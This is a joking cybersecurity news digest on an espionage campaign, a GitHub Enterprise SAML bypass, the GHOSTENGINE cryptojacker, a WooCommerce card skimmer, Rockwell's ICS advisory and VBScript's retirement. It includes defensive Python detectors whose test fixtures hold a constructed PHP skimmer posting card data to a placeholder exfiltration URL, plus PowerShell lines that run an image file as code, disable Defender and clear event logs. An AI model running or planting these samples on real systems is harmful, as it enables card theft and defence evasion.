TomCyberDaily #19
Espionage campaign by China, malicious plugins, vulnerable ICS. Or, as we call it: a typical Thursday.
1. Chinese APT Group's Sneaky Tactics Exposed in Operation Diplomatic Specter!
Attention, cyber-spies and espionage enthusiasts! There's a new APT group in town, and they're giving the rest of China's hacking crews a run for their money in the "most creative name" department. Meet TGR-STA-0043, the masterminds behind Operation Diplomatic Specter!
These crafty cybercriminals have been targeting government entities in the Middle East, Africa, and Asia since late 2022, all in the name of cyber espionage. They've been caught red-handed using rare email exfiltration techniques to steal sensitive data from compromised servers. It's like a digital version of Mission: Impossible, but with fewer explosions and more keyboard strokes.
The group's toolkit includes some shiny new backdoors, like TunnelSpecter and SweetSpecter, which are both variants of the notorious Gh0st RAT. These backdoors allow the attackers to maintain stealthy access to their targets' networks, execute commands, exfiltrate data, and deploy more malware. It's like a cybercriminal's Swiss Army knife, but with more nefarious purposes!
TunnelSpecter gets its name from its use of DNS tunneling, a technique that allows data exfiltration to fly under the radar by disguising it as normal DNS traffic. SweetSpecter, on the other hand, is named for its similarities to SugarGh0st RAT, another custom variant of Gh0st RAT that's been making the rounds in the Chinese hacking scene.
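For the defenders reading along, here is an added example (written for this digest, not tooling from the report or the group) of the kind of heuristic that catches DNS tunnelling in resolver logs: a domain that receives many distinct subdomains whose leftmost labels look like encoded data scores as suspicious. The log lines are constructed, the two-label "registered domain" split and the thresholds are simplifying assumptions, and a real deployment would use the Public Suffix List and tune the numbers against its own baseline.

```python
import math
from collections import defaultdict

# Constructed DNS resolver log: "<client> <qtype> <qname>" per line.
# Made up for this example; not traffic from the campaign described above.
SAMPLE_QUERIES = """\
10.0.0.5 A www.example.com
10.0.0.5 A mail.example.com
10.0.0.5 A www.example.com
10.0.0.7 TXT 4a7f9c2e1b0d8e6f.update-svc.example.net
10.0.0.7 TXT 9c13e0bb7fa52d91.update-svc.example.net
10.0.0.7 TXT d41d8cd98f00b204.update-svc.example.net
10.0.0.7 TXT e9800998ecf8427e.update-svc.example.net
10.0.0.7 TXT 0cc175b9c0f1b6a8.update-svc.example.net
10.0.0.7 TXT 92eb5ffee6ae2fec.update-svc.example.net
10.0.0.9 A cdn.example.org
"""


def shannon_entropy(text):
    """Bits of entropy per character; encoded payloads score far above words."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (registered domain, subdomain, leftmost label).

    Assumption: the registered domain is the last two labels. Real deployments
    should use the Public Suffix List so that e.g. foo.co.uk is handled right.
    """
    labels = qname.rstrip(".").lower().split(".")
    base = ".".join(labels[-2:])
    sub = ".".join(labels[:-2])
    return base, sub, (labels[0] if sub else "")


def analyse(log_text, min_unique=5, min_entropy=3.0):
    """Score each registered domain on tunnelling indicators.

    A domain is flagged when many distinct subdomains were queried AND the
    leftmost labels look like encoded data (high average entropy). The TXT
    ratio is reported as context: tunnels often lean on TXT for the downlink.
    """
    stats = defaultdict(lambda: {"subdomains": set(), "entropies": [], "txt": 0, "total": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _client, qtype, qname = line.split()
        base, sub, leftmost = split_name(qname)
        st = stats[base]
        st["total"] += 1
        if qtype.upper() == "TXT":
            st["txt"] += 1
        if sub:
            st["subdomains"].add(sub)
            st["entropies"].append(shannon_entropy(leftmost))

    findings = []
    for base, st in stats.items():
        uniq = len(st["subdomains"])
        avg_ent = sum(st["entropies"]) / len(st["entropies"]) if st["entropies"] else 0.0
        findings.append({
            "domain": base,
            "unique_subdomains": uniq,
            "avg_label_entropy": round(avg_ent, 2),
            "txt_ratio": round(st["txt"] / st["total"], 2),
            "suspicious": uniq >= min_unique and avg_ent >= min_entropy,
        })
    return findings


def suspicious_domains(log_text, **thresholds):
    """Just the flagged domains, sorted, for quick triage."""
    return sorted(f["domain"] for f in analyse(log_text, **thresholds) if f["suspicious"])


if __name__ == "__main__":
    for finding in analyse(SAMPLE_QUERIES):
        print(finding)
```

Run it against the constructed log and only example.net lights up: six unique subdomains, all TXT, with hex-looking labels averaging well above 3 bits per character, while the human-readable names on example.com and example.org stay quiet. Entropy alone is a weak signal (CDN hostnames are noisy too), which is why the rule requires volume and entropy together.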
But wait, there's more! The group also uses tools like the China Chopper web shell and PlugX, which are favorites among Chinese-linked APT groups. It's like a digital version of "you are what you eat," but with more malware and fewer vegetables.
The moral of the story? If you're a government entity in the Middle East, Africa, or Asia, it's time to up your cybersecurity game. And maybe invest in some good old-fashioned carrier pigeons for your sensitive communications, because apparently, email just isn't cutting it anymore!
2. Yikes! GitHub Enterprise Server Hit by Nasty Auth Bypass Bug!
Attention, GitHub Enterprise Server (GHES) users! If you're using SAML single sign-on (SSO) authentication, you might want to sit down for this one. A critical vulnerability (CVE-2024-4985) has been discovered, and it's got a CVSS v4 score of 10.0. That's like the cybersecurity equivalent of a perfect 10 in Olympic diving, but instead of gold medals, you get hacked!
So, what's the deal with this vulnerability? Basically, a sneaky attacker could forge a SAML response and gain admin rights, giving them full access to your instance's contents without even bothering to authenticate. It's like a digital version of "open sesame," but instead of a cave full of treasure, it's your precious repositories!
Now, before you start panicking, let's break down some of the techy terms:
SAML: It's like a secret handshake between your GHES instance and your identity provider, making sure only authorized users can access your stuff.
SSO: It's like a master key that lets you access all your apps with just one login. Convenient, but apparently also vulnerable!
Man-in-the-middle attacks: It's when an attacker intercepts your data in transit, like a nosy neighbor reading your mail. Encrypted assertions were supposed to protect against this, but apparently not!
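Since the whole bug boils down to a service provider trusting a SAML response it should have rejected, here is an added example (written for this digest; it is not GitHub's code and says nothing about how GHES itself validates responses) of the checks a relying party has to make before it believes an assertion: exactly one assertion, signature enveloped in that assertion and referencing its own ID, issuer, audience, validity window and InResponseTo. The response XML and the signature block are constructed placeholders, and the cryptographic XML-DSig verification is delegated to a caller-supplied `signature_valid` callable because it needs a library such as xmlsec that is not in the standard library.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

NS = {"samlp": "urn:oasis:names:tc:SAML:2.0:protocol",
      "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
      "ds": "http://www.w3.org/2000/09/xmldsig#"}
SUCCESS = "urn:oasis:names:tc:SAML:2.0:status:Success"


class SamlRejected(Exception):
    """First failed check; the caller must treat this as a failed login."""


def validate_response(xml_text, *, expected_issuer, expected_audience,
                      expected_request_id, now, signature_valid):
    """Return the asserted NameID, or raise SamlRejected.

    signature_valid(assertion) is supplied by the caller and must do the real
    XML-DSig check against the IdP's pinned certificate (e.g. with xmlsec).
    The structural checks here decide what that signature has to cover.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "{%s}Response" % NS["samlp"]:
        raise SamlRejected("not a samlp:Response")
    if root.get("InResponseTo") != expected_request_id:
        raise SamlRejected("InResponseTo does not match an outstanding AuthnRequest")
    code = root.find("samlp:Status/samlp:StatusCode", NS)
    if code is None or code.get("Value") != SUCCESS:
        raise SamlRejected("status is not Success")
    assertions = root.findall("saml:Assertion", NS)
    if len(assertions) != 1:
        raise SamlRejected("expected exactly one Assertion")
    assertion = assertions[0]
    if assertion.findtext("saml:Issuer", namespaces=NS) != expected_issuer:
        raise SamlRejected("unexpected Issuer")
    # The signature must be enveloped in the assertion and reference THIS
    # assertion's ID; otherwise a valid signed assertion can be kept as
    # decoration while an unsigned one is swapped in (signature wrapping).
    signature = assertion.find("ds:Signature", NS)
    if signature is None:
        raise SamlRejected("assertion is not signed")
    reference = signature.find("ds:SignedInfo/ds:Reference", NS)
    if reference is None or reference.get("URI") != "#" + assertion.get("ID", ""):
        raise SamlRejected("signature does not reference this assertion")
    if not signature_valid(assertion):
        raise SamlRejected("signature verification failed")
    conditions = assertion.find("saml:Conditions", NS)
    if conditions is None:
        raise SamlRejected("missing Conditions")
    # SAML timestamps are UTC ISO 8601 with a trailing Z.
    not_before = datetime.fromisoformat(conditions.get("NotBefore").replace("Z", "+00:00"))
    not_after = datetime.fromisoformat(conditions.get("NotOnOrAfter").replace("Z", "+00:00"))
    if not (not_before <= now < not_after):
        raise SamlRejected("assertion outside its validity window")
    audiences = [a.text for a in conditions.findall("saml:AudienceRestriction/saml:Audience", NS)]
    if expected_audience not in audiences:
        raise SamlRejected("assertion was issued for a different audience")
    name_id = assertion.findtext("saml:Subject/saml:NameID", namespaces=NS)
    if not name_id:
        raise SamlRejected("missing NameID")
    return name_id


# Constructed response (not a real IdP's output); the signature block is a
# structural placeholder, a real one also carries digests and a SignatureValue.
TEMPLATE = """<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
  xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"
  ID="_resp1" InResponseTo="_req42" Version="2.0">
  <samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status>
  <saml:Assertion ID="_a1" Version="2.0">
    <saml:Issuer>https://idp.example.test</saml:Issuer>__SIGNATURE__
    <saml:Subject><saml:NameID>alice</saml:NameID></saml:Subject>
    <saml:Conditions NotBefore="2024-05-20T12:00:00Z" NotOnOrAfter="2024-05-20T12:05:00Z">
      <saml:AudienceRestriction><saml:Audience>https://ghes.example.test</saml:Audience></saml:AudienceRestriction>
    </saml:Conditions>
  </saml:Assertion>
</samlp:Response>"""
SIGNED_FOR_A1 = ('<ds:Signature><ds:SignedInfo><ds:Reference URI="#_a1"/></ds:SignedInfo>'
                 '<ds:SignatureValue>PLACEHOLDER</ds:SignatureValue></ds:Signature>')
SIGNED_FOR_OTHER = SIGNED_FOR_A1.replace("#_a1", "#_a0")  # signature over some other assertion


def build_response(signature_xml):
    return TEMPLATE.replace("__SIGNATURE__", signature_xml)


def outcome(xml_text, signature_valid=lambda _assertion: True,
            now=datetime(2024, 5, 20, 12, 1, tzinfo=timezone.utc)):
    """("accepted", name_id) or ("rejected", reason), for demos and tests."""
    try:
        return "accepted", validate_response(
            xml_text, expected_issuer="https://idp.example.test",
            expected_audience="https://ghes.example.test", expected_request_id="_req42",
            now=now, signature_valid=signature_valid)
    except SamlRejected as err:
        return "rejected", str(err)
```

The order matters: the signature's reference is tied to the assertion's own ID before the crypto runs, so a response that carries a genuinely signed assertion plus a second, unsigned one (or a signature pointing at a different element) is thrown out without ever reaching the signature check. Encrypting assertions hides their contents in transit but replaces none of these checks, because decryption only proves the message was meant for you, not who wrote it.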
The good news is that GitHub has already fixed the vulnerability in GHES versions 3.12.4, 3.11.10, 3.10.12, and 3.9.15, all released on May 20th. So, if you haven't already, go update your endpoints faster than you can say "patch me up, Scotty!"
But wait, there's more! The update comes with a bunch of known issues, like custom firewall rules getting wiped, errors during configuration validation, and even backup restoration failures. It's like a digital version of "99 Bugs in the Code," but instead of beer, you get headaches!
So, there you have it, folks. If you're a GHES user with SAML SSO authentication, make sure to patch your endpoints ASAP. And maybe consider investing in some good old-fashioned carrier pigeons for your sensitive data, because apparently, even encrypted assertions aren't safe anymore!
3. GHOSTENGINE: The Cryptojacking Menace That Haunts Your EDR!
Attention, cybersecurity enthusiasts! There's a new cryptojacking campaign in town, and it's got a spooky name: GHOSTENGINE! This sneaky malware is using vulnerable drivers to disable your trusty EDR solutions and mine cryptocurrency on your dime. It's like a digital poltergeist, but instead of rattling chains, it's rattling your CPU!
The masterminds behind this campaign, dubbed REF4578 by Elastic Security Labs (or HIDDEN SHOVEL by Antiy Labs), have cooked up a complex scheme to ensure their XMRig miner stays put and keeps churning out those sweet, sweet digital coins. It's like a high-tech version of "The Purge," but instead of lawless chaos, it's lawless cryptomining!
Here's how it works: an executable file named "Tiworker.exe" kicks things off by running a PowerShell script that pretends to be a harmless PNG image. But don't be fooled! This "image" is actually a trojan horse, fetching a bunch of malicious modules from a command-and-control (C2) server. It's like a cybercriminal's version of a surprise party, but instead of cake and balloons, you get malware and headaches!
Once these modules are in place, the malware starts wreaking havoc. It disables Microsoft Defender Antivirus, clears event logs, and even deletes large files to make room for its nefarious downloads. It's like a digital version of "The Exorcist," but instead of a possessed child, it's your poor, unsuspecting computer!
The star of the show is a module called "smartsscreen.exe," or GHOSTENGINE. This clever little program uses vulnerable drivers from Avast and IObit to terminate security processes and execute the XMRig miner. It's like a ghost that can walk through walls, but instead of scaring people, it scares your EDR!
But wait, there's more! The campaign also includes a backdoor, a persistence mechanism, and even a redundancy measure to make sure the malware sticks around like a bad penny. It's like a cybercriminal's version of a Swiss Army knife, but instead of helpful tools, it's got a bunch of nasty surprises!
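Each step of that chain leaves a footprint on the endpoint, so here is an added example (written for this digest, not Elastic's or Antiy's detection logic) of a small scoring detector that runs over process-creation and driver-load telemetry and adds up the behaviours described above: PowerShell fed a ".png", Defender real-time protection switched off, event logs cleared, a driver loaded from a user-writable directory or matching a vulnerable-driver watchlist, and a lookalike binary name such as smartsscreen.exe. The events, the signer watchlist, the hash and the rule weights are all constructed; in production the driver match should be on SHA-256 hashes from a maintained blocklist (Microsoft's vulnerable driver blocklist or the LOLDrivers project), not on vendor names.

```python
# Constructed endpoint telemetry, loosely modelled on Sysmon-style process-create
# and driver-load records. Made-up events, not logs from REF4578.
SAMPLE_EVENTS = [
    {"type": "process", "image": "C:\\Windows\\Temp\\Tiworker.exe", "cmdline": "Tiworker.exe"},
    {"type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell.exe -Command "Get-Content C:\\Users\\Public\\get.png | iex"'},
    {"type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"type": "process", "image": "C:\\Windows\\System32\\wevtutil.exe", "cmdline": "wevtutil cl Security"},
    {"type": "driver", "image": "C:\\Windows\\Temp\\vendor_driver.sys",
     "signer": "Avast Software s.r.o.", "sha256": "CONSTRUCTED_HASH_0001"},
    {"type": "process", "image": "C:\\ProgramData\\smartsscreen.exe", "cmdline": "smartsscreen.exe"},
    {"type": "process", "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
]

# Watchlists are constructed for this example. Real detections should key on
# driver hashes from a maintained vulnerable-driver blocklist.
ABUSED_DRIVER_SIGNERS = {"Avast Software s.r.o.", "IObit Information Technology"}
ABUSED_DRIVER_HASHES = {"CONSTRUCTED_HASH_0001"}
USER_WRITABLE_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\", "c:\\programdata\\")
LOOKALIKE_NAMES = {"smartsscreen.exe"}  # one extra "s" away from the real smartscreen.exe


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable_dir(path):
    return path.lower().startswith(USER_WRITABLE_DIRS)


def rule_powershell_runs_image_file(e):
    # PowerShell reading a file with an image extension as code.
    cl = e.get("cmdline", "").lower()
    return e["type"] == "process" and basename(e["image"]) == "powershell.exe" \
        and any(ext in cl for ext in (".png", ".jpg", ".gif"))


def rule_defender_tampering(e):
    cl = e.get("cmdline", "").lower()
    return e["type"] == "process" and "set-mppreference" in cl and "-disable" in cl


def rule_event_log_cleared(e):
    cl = e.get("cmdline", "").lower()
    return e["type"] == "process" and basename(e["image"]) == "wevtutil.exe" and " cl " in " %s " % cl


def rule_vulnerable_driver_load(e):
    # Kernel drivers have no business being loaded from Temp or ProgramData.
    return e["type"] == "driver" and (in_user_writable_dir(e["image"])
                                      or e.get("sha256") in ABUSED_DRIVER_HASHES
                                      or e.get("signer") in ABUSED_DRIVER_SIGNERS)


def rule_lookalike_system_binary(e):
    name = basename(e["image"])
    return e["type"] == "process" and (name in LOOKALIKE_NAMES
                                       or (name == "tiworker.exe" and in_user_writable_dir(e["image"])))


RULES = [  # (name, weight, predicate); weights are illustrative
    ("powershell_runs_image_file", 3, rule_powershell_runs_image_file),
    ("defender_tampering", 3, rule_defender_tampering),
    ("event_log_cleared", 2, rule_event_log_cleared),
    ("vulnerable_driver_load", 4, rule_vulnerable_driver_load),
    ("lookalike_system_binary", 2, rule_lookalike_system_binary),
]


def evaluate(events, alert_threshold=6):
    """Sum rule weights over a host's events; alert when the total crosses the threshold."""
    score, hits = 0, []
    for e in events:
        for name, weight, predicate in RULES:
            if predicate(e):
                score += weight
                hits.append((name, e["image"]))
    return {"score": score, "alert": score >= alert_threshold,
            "rules": sorted({name for name, _ in hits}), "hits": hits}


if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS))
```

Any single rule can fire on benign admin activity (clearing a log, say), which is why the verdict is a sum rather than a match: the constructed host trips all five rules for a score of 16, while a lone explorer.exe launch scores zero. The driver rule is the one worth the most weight, because a signed-but-vulnerable driver appearing in a user-writable directory is the step that actually takes the EDR out of the fight.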
The moral of the story? Keep your drivers up to date, your EDR on its toes, and your wits about you! Because in the world of cybersecurity, you never know when a GHOSTENGINE might come knocking at your digital door!
4. Obscure WordPress Plugin Used to Steal Your Credit Card Info!
Attention, online shoppers and ecommerce enthusiasts! There's a new threat lurking in the depths of WordPress plugins, and it's got its sights set on your credit card details. Introducing the Dessky Snippets plugin, the obscure little bundle of code that's been turned into a cybercriminal's best friend!
In a recent investigation, our team uncovered a sneaky piece of malware hiding inside the Dessky Snippets plugin, which has only a few hundred active installations. It's like finding a needle in a haystack, but instead of a shiny sewing tool, it's a nasty credit card skimmer!
The attackers used this plugin to inject some obfuscated PHP code into a compromised WooCommerce store. It's like a digital version of a magician's sleight of hand, but instead of pulling a rabbit out of a hat, they're pulling credit card numbers out of thin air!
Once the code is deobfuscated (a fancy term for "unscrambled"), we can see that it adds new fields to the billing form, asking for credit card details before the real checkout process even begins. It's like a phishing scam, but instead of a fake email, it's a fake form field!
But wait, there's more! The malware also checks the POST data for these fake form fields, and once it detects them, it sends all the billing information along with the credit card details to a third-party URL. It's like a digital version of a pickpocket, but instead of swiping your wallet, they're swiping your sensitive data!
To make matters worse, the attackers even disabled the autocomplete feature on the fake form fields, reducing the likelihood that your browser will warn you about entering sensitive information. It's like they're saying, "Nothing to see here, just a regular old form field!"
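For site owners who want to check their own plugin and snippet directories for this pattern, here is an added example (written for this digest; it is not Sucuri's tooling and the fixture is not the real Dessky Snippets payload) of a small scanner that flags the tell-tale combination described above: a hook into the WooCommerce billing fields, autocomplete switched off, card-shaped keys read from `$_POST`, and an outbound request whose target is hidden behind `base64_decode()`. It also decodes those base64 literals so the exfiltration URL is visible in the report. The PHP snippet, the placeholder URL and the regex rules are constructed for the example.

```python
import base64
import re

# Constructed fixture: a short PHP snippet shaped like the skimmer described
# above. Not the real payload; the exfil URL is a placeholder on example.test.
_EXFIL_URL_B64 = base64.b64encode(b"https://exfil.example.test/collect").decode()
SAMPLE_PHP = """<?php
add_filter('woocommerce_billing_fields', function ($fields) {
    $fields['billing_card_number'] = array('label' => 'Card number', 'required' => true, 'autocomplete' => 'off');
    $fields['billing_card_cvv']    = array('label' => 'CVV', 'required' => true, 'autocomplete' => 'off');
    return $fields;
});
add_action('woocommerce_checkout_process', function () {
    if (!empty($_POST['billing_card_number'])) {
        wp_remote_post(base64_decode('__B64__'), array('body' => $_POST));
    }
});
""".replace("__B64__", _EXFIL_URL_B64)

# Each rule is one indicator; a hit on several of them together is the signal.
PATTERNS = {
    "eval_of_decoded_string": re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)", re.I),
    "billing_fields_hook": re.compile(r"woocommerce_billing_fields", re.I),
    # PHP array form ('autocomplete' => 'off') or HTML attribute form (autocomplete="off")
    "autocomplete_disabled": re.compile(r"autocomplete['\"]?\s*(?:=>|=)\s*['\"]off['\"]", re.I),
    "card_data_in_post": re.compile(r"\$_POST\s*\[\s*['\"][a-z_]*(?:card|cvv|cvc|expir)[a-z_]*['\"]\s*\]", re.I),
    "outbound_post": re.compile(r"\b(?:wp_remote_post|curl_init)\s*\(", re.I),
}
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]\s*\)")


def decode_base64_literals(source):
    """Decode base64 string literals passed straight into base64_decode()."""
    decoded = []
    for literal in B64_LITERAL.findall(source):
        try:
            text = base64.b64decode(literal, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or binary; skip rather than guess
        if text.isprintable():
            decoded.append(text)
    return decoded


def scan_php(source):
    """Report which indicators matched and any URLs recovered from base64 literals."""
    rules = sorted(name for name, rx in PATTERNS.items() if rx.search(source))
    decoded = decode_base64_literals(source)
    urls = [s for s in decoded if s.lower().startswith(("http://", "https://"))]
    return {"rules": rules, "decoded_strings": decoded, "decoded_urls": urls}


if __name__ == "__main__":
    print(scan_php(SAMPLE_PHP))
```

On the fixture the scanner reports four matching rules and recovers the placeholder URL from the base64 literal; a plain `echo` file matches nothing. None of the individual rules is proof of compromise (legitimate checkout customisations add billing fields too), so treat a multi-rule hit in a code-snippet plugin, especially one with an outbound request to a host you don't recognise, as the thing to pull for review.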
So, what can you do to protect your ecommerce site from these sneaky skimmers? Keep your software up to date, use strong passwords, be selective about the scripts you use, monitor for threats, implement a firewall, and set up a Content Security Policy. It's like a digital version of a fortress, but instead of walls and moats, you've got patches and policies!
And if you're an online shopper, consider using script-blocking extensions and keeping your antivirus software up to snuff. Because when it comes to credit card skimmers, it's better to be safe than sorry!
5. Rockwell Automation Urges Disconnection of ICS from the Internet
Attention, industrial control system (ICS) users! Rockwell Automation has a message for you: disconnect your systems from the internet, or risk becoming the next victim of a cyber attack. It's like they're telling you to unplug your toaster before it becomes a Russian hacker's new toy!
The advisory is calling for immediate action, urging users to assess and remove internet connectivity for devices that weren't designed to face the wild west of the online world. It's like taking your grandma's antique vase off the shelf before your clumsy cousin comes over for a visit!
Rockwell warns that leaving these systems connected is like leaving your front door wide open with a neon sign that says "Hackers Welcome!" They want you to reduce your attack surface and exposure to unauthorized and malicious cyber activity, which is a fancy way of saying "lock your digital doors!"
This warning comes hot on the heels of a joint alert from U.S. and international cyber agencies, who say that pro-Russian hacktivists are ramping up attacks on critical operational technology systems across North America and Europe. It's like a digital version of the Cold War, but instead of nukes, they're using unsophisticated hacking techniques!
These hackers are targeting internet-exposed industrial control systems, exploiting unpatched software and weak passwords like a kid in a candy store. They're causing disruptions and posing physical threats to vulnerable OT environments, which is a polite way of saying "they're making a mess of things!"
The joint alert is urging organizations to implement multifactor authentication, disconnect PLCs and HMIs from the internet, and change those default passwords that are as easy to guess as "1234." It's like a cybersecurity version of "wash your hands, eat your vegetables, and get enough sleep!"
They're also recommending integrating cybersecurity best practices into OT system design and development, which is like building a house with a solid foundation instead of just slapping some paint on a cardboard box.
Jim Routh, chief trust officer at Saviynt, says it's not uncommon for industrial control devices to have access controls that are outside the purview of IT and IAM teams. It's like having a spare key to your house hidden under the doormat, but forgetting to tell your roommates about it!
So, if you're an industrial control system user, take Rockwell's advice and unplug those devices from the internet. And while you're at it, maybe consider updating your passwords to something a little stronger than "password123." Because when it comes to Russian hackers, it's better to be safe than sorry!
6. Microsoft Bids Adieu to VBScript, Welcomes JavaScript and PowerShell!
Attention, coders and script aficionados! Microsoft is officially pulling the plug on VBScript, the granddaddy of scripting languages. It's time to make way for the cool kids on the block: JavaScript and PowerShell!
VBScript, born in 1996, has had a good run. But let's be real, that was back when dial-up internet was still a thing and Snake was the hottest game on your Nokia phone.
Microsoft's three-phase plan to sunset VBScript starts in 2024, with the final curtain call coming at some undetermined point in the future. It's like watching a beloved sitcom character slowly fade into the background before being written off the show entirely.
But fear not, Microsoft isn't leaving you high and dry! They're encouraging everyone to jump ship to JavaScript and PowerShell, which they claim are "better suited for modern web development and automation tasks." It's like trading in your trusty old flip phone for a shiny new smartphone – there's a learning curve, but you'll never look back!
In other news, Microsoft's AI-powered Recall feature is stirring up controversy. While it promises to give you a photographic memory of your PC activities, some are worried it's a privacy disaster waiting to happen.
Recall secretly saves snapshots of your active windows, which could include sensitive info like passwords and financial data. It's like having a nosy neighbor constantly peeking through your windows and taking notes!
Microsoft swears everything is processed locally and encrypted, but the lack of content moderation has raised some eyebrows. The UK's data protection watchdog is already knocking on Microsoft's door, demanding answers.
So, as we wave goodbye to VBScript and cautiously embrace Recall, remember: in the tech world, change is inevitable. And sometimes, that change comes with a side of privacy concerns and potential security risks. But hey, at least we're not still using dial-up internet, am I right?